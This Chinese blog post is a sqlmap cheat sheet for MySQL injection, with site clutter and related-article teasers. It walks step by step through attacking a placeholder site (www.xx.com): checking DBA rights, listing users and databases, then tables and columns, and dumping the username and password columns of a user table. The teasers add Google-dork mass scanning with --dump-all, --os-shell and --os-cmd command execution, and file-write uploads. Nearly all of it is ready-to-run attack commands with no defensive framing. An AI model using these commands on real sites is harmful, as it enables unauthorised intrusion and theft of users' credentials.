MySQL数据库注入

最新推荐文章于 2022-02-18 17:18:17 发布
最新推荐文章于 2022-02-18 17:18:17 发布
阅读量251 收藏 1
点赞数
分类专栏: SQLMAP
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42452926/article/details/104719715
版权

sqlmap.py -u http://www.xx.com/show.php?id=81 --当前用户权限

例:
sqlmap.py -u “http://www.xx.com/show.php?id=81” --is-dba

sqlmap.py -u http://www.xx.com/show.php?id=81 --所有数据库用户

例:
sqlmap.py -u “http://www.xx.com/show.php?id=81” --users

sqlmap.py -u http://www.xx.com/show.php?id=81 --当前数据库用户

例:
sqlmap.py -u “http://www.xx.com/show.php?id=81” --current-user

1.检测注入点,判断数据库类型及服务器等类型

sqlmap.py -u http://www.xx.com/show.php?id=81

例:
sqlmap.py -u “http://www.xx.com/show.php?id=81”

2.获取所有数据库

sqlmap.py -u http://www.xx.com/show.php?id=81 --获取所有数据库

例:
sqlmap.py -u “http://www.xx.com/show.php?id=81” --dbs

3.获取网站当前数据库

sqlmap.py -u http://www.xx.com/show.php?id=81 --获取网站当前数据库

例:
sqlmap.py -u “http://www.xx.com/show.php?id=81” --current-db

4.获取数据库中的表

sqlmap.py -u http://www.xx.com/show.php?id=81 -D 指定一个数据库 --tables

例:
sqlmap.py -u “http://www.xx.com/show.php?id=81” -D zsb --tables

5.获取数据表中的字段

sqlmap.py -u http://www.xx.com/show.php?id=81 -D 数据库 -T 数据表 --columns

例:
sqlmap.py -u “http://www.xx.com/show.php?id=81” -D zsb -T user --columns

6.获取字段中的内容

sqlmap.py -u http://www.xx.com/show.php?id=81 -D 数据库 -T 数据表 -C 字段名1,字段名2,字段名3… --dump

例:
sqlmap.py -u “http://www.xx.com/show.php?id=81” -D zsb -T user -C “u_id,u_name,u_pass” --dump

怪獸哪裡跑
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
jmeter 往mysql数据库注入压测数据示例
03-27
jmeter 往mysql数据库注入压测数据示例
WEB安全基础 - - -SQL注入利用
weixin_67503304的博客
07-13 991
以web安全中的SQL语句为了,以sqli-labs的Less-1为例子,详细解释了SQL语句的利用。
SQL注入——基于报错的注入(2)
qq_52072846的博客
02-18 802
实验目的 熟悉报错功能函数floor()的用法,掌握基于报错的SQL注入基本流程。 实验原理 (1)关于报错注入 基于报错的注入,是指通过构造特定的SQL语句,让攻击者想要查询的信息(如数据库名、版本号、用户名等)通过页面的错误提示回显出来。 报错注入一般需要具备两个前提条件:(1) Web应用程序未关闭数据库报错函数,对于一些SQL语句的错误直接回显在页面上;(2)后台未对一些具有报错功能的函数进行过滤。 常用的报错功能函数包括extractvalue()、updatexml()、floor()、ex
Navicat for MySQL导入renren-security mysql.sql数据库
love mango love stray
02-26 441
MySQL v8.0.15,可以用Navicat for MySQL导入renren-security\renren-admin\db\mysql.sql数据库 创建与MySQL的连接 -》连接-》MySQL 输入数据库的IP地址,端口号,用户名,密码 -》确定 连接成功后,右键-》新建数据库,在下面的弹框中输入对应的数据库名称和数据库的编码方式-》确定 数据库创建后如图所示: ...
SpringBoot 集成 SpringSecurity 详解(四)-- 基于MySQL数据库实现多用户认证信息
kk鲁
09-26 984
SpringBoot 集成 SpringSecurity 详解(四)-- 基于MySQL数据库实现多用户认证信息需求缘起技术要点1.添加依赖2. 添加配置3.创建实体类 userinfo4.创建Repository5. UserInfo 实现业务逻辑6.添加用户信息7.实现 UserDetailsService 接口中的 loadUserByUsername() 方法8.启动测试即可 需求缘起 上...
mysql数据库命令练习与注入
01-21
mysql
MySQL数据库-SQL注入手册1
08-08
This post is part of a series of SQL Injection Cheat Sheets. In this series, I’
mysql5 注入漏洞
10-30
mysql5注入漏洞代码
新闻发布系统mysql数据库设计
最新发布
09-04
当设计新闻发布系统时,通常需要考虑以下功能模块: ...例如,可以使用MySQL或其他关系型数据库来存储新闻、分类、评论等数据。同时,可以选择使用PHP、Java、Python等编程语言来编写系统的后端逻辑和接口。
SQL注入基于报错的注入2
Snowflake1997的博客
02-18 124
问SQLi-Labs网站 在攻击机Pentest-Atk打开FireFox浏览器,并访问靶机A-SQLi-Labs上的SQLi-Labs网站Less-2。访问的URL为: http://[靶机IP]/sqli-labs/Less-1/ 登录后,根据网页提示,给定一个GET参数,即: http://[靶机IP]/sqli-labs/Less-1/?id=1 此时页面显示id=1的用户名Dump、密码Dump。 以此来检验浏览器是否安装Hackbar插件,界面F9按键是启用或停用。 寻..
sql注入获取mysql信息_手把手教你通过SQL注入盗取数据库信息
weixin_33473110的博客
02-11 932
我们都是善良的银!一生戎码只为行侠仗义,知道这个不是为了做啥非法的事,只是知道小偷怎么偷东西才能更好地防范。SQL注入(SQL Injection),指将非法的SQL命令插入到URL或者Web表单中请求,而这些请求被服务器认为是正常的SQL语句进行执行。下面我们用sqli-labs这个开源项目来演示一下SQL注入盗取信息的全程,我们不是为了sqli-labs是一个sql注入的练习靶机,项目地址为:...
springboot+springsecurity+oauth2整合(并用mysql数据库实现持久化客户端数据)
热门推荐
Victor_An的博客
08-13 2万+
springboot+springsecurity+oauth2整合(并用mysql实现持久化) 本文主要讲的是,实现oauth2的工作流程,需要对oauth2.0概念有一定的基础知识了解。阅读前请学习oauth2.0的理论知识。文末有此项目代码地址。 介绍 AuthorizationServer的搭建 创建Client 请求access_token 刷新access_token 介......
mysql security_MySQL安全配置向导mysql_secure_installation详解_MySQL - security
weixin_31417135的博客
01-18 689
关于 store routines 里面的SQL SECURITY 定义,我来解释下。SQL SECURITY DEFINER 表示定义者必须有相关权限。SQL SECURITY INV版权声明:原创作品,允许转载,转载时请务必以超链接形式标明文章 原始出处 、作者信息...bitsCN.com安装完mysql-server 会提示可以运行mysql_secure_installation。运行m...
MySQL注入入门类型
cyjmosthandsome的博客
02-26 1303
MySQL数据库基础知识及注入   一、 网站后台的PHP代码 <?php     echo "HELLO";     $id = $_GET['id'];  #$id使用GET方式传入     $conn = mysqli_connect('localhost', 'root', '913347102', 'tpshop'); #连接MySQL数据库     if(!...
注入点之Google搜索(附关键字)
security.blog.cndn.net
03-11 2598
利用Google Dorks字符串找到可注入的网站 sqlmap.py -g(g即为谷歌的意思) 加上搜索引擎的语言(即google关键字) 使用示例: 1. sqlmap.py -g "inurl:php?id=" 2. sqlmap.py -g "inurl:php?id=" --dump-all --batch google搜索注入点 自动跑出所有字段 部分...
file参数使用
security.blog.cndn.net
03-07 1394
权限:必须为dba权限 file-write 从本地写入 file-dest 写入目标路径 判断是否是dba权限(显示TRUE或者FALSE,TRUE即为dba权限,反之不是) sqlmap.py -u “http://www.xx.com/aa.aspx?id=123” --is-dba 写入文件至站点目录 sqlmap.py -u “http://www.xx.com/aa.aspx?id=1...
交互写shell及命令执行
security.blog.cndn.net
03-07 544
1.执行系统命令(windows系统): --os-cmd=ipconfig sqlmap.py -u “http://www.xx.com/aa.aspx?id=123” --os-cmd=ipconfig 执行后根据提示选择网站语言 然后回车,指定目标站点根目录,然后继续回车即可完整执行命令 2.执行shell: --os-shell sqlmap.py -u “http://www.xx.c...
POST登陆框注入
security.blog.cndn.net
03-07 479
1.burpsuite + sqlmap 利用burpsuite抓包保存为txt,利用sqlmap指定文本注入(此方法本人未实战过,是很普遍的方法,详情请自行百度) 注入点:http://www.xx.com/Login.asp sqlmap.py -r test.txt -p Password 2.自动注册表单,截取数据。(直接在后面加[–forms]) sqlmap -u “http://ww...
mysql数据库安全防护sql注入
06-13
SQL注入攻击是利用Web应用程序没有对用户输入的数据进行充分验证过滤,直接将用户输入的数据拼接到SQL语句中执行,从而导致数据库被攻击者非法访问或者非法修改。 为了防止SQL注入攻击,我们可以采取以下措施: 1....

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值